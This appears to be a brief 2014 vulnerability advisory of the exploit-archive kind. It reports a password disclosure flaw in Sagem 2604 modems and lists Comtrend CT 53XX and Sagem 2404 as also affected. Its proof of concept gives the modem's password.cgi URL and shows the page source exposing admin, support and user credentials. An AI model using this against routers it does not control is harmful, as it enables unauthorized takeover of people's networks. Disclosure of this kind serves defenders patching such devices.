|
[+]Title: Sagem 2604 Password Discolusre vulnerability
[+]Author: TUNISIAN CYBER
[+]Date: 6/JUN/2014
[+]Type:WebApp
[+]Risk:High
[+]Affected Version: v2604
Hardware Version: 253251193
Software Version: 3.21a4G
[+]Overview:
Sagem modem suffers, from a password discolsure vulnerability.
[+]Proof Of Concept:
myrouter/(or)192.168.1.1/password.cgi
View Source
pwdAdmin = 'password';
pwdSupport = 'password';
pwdUser = 'password';
nmAdmin = 'username';
nmSupport = 'username';
nmUser = 'username';
http://i.imgur.com/2g55TRn.png
Other modems which suffers from this vuln.:
Comtrend CT 53XX
Sagem 2404
TUNISIAN CYBER-2014
|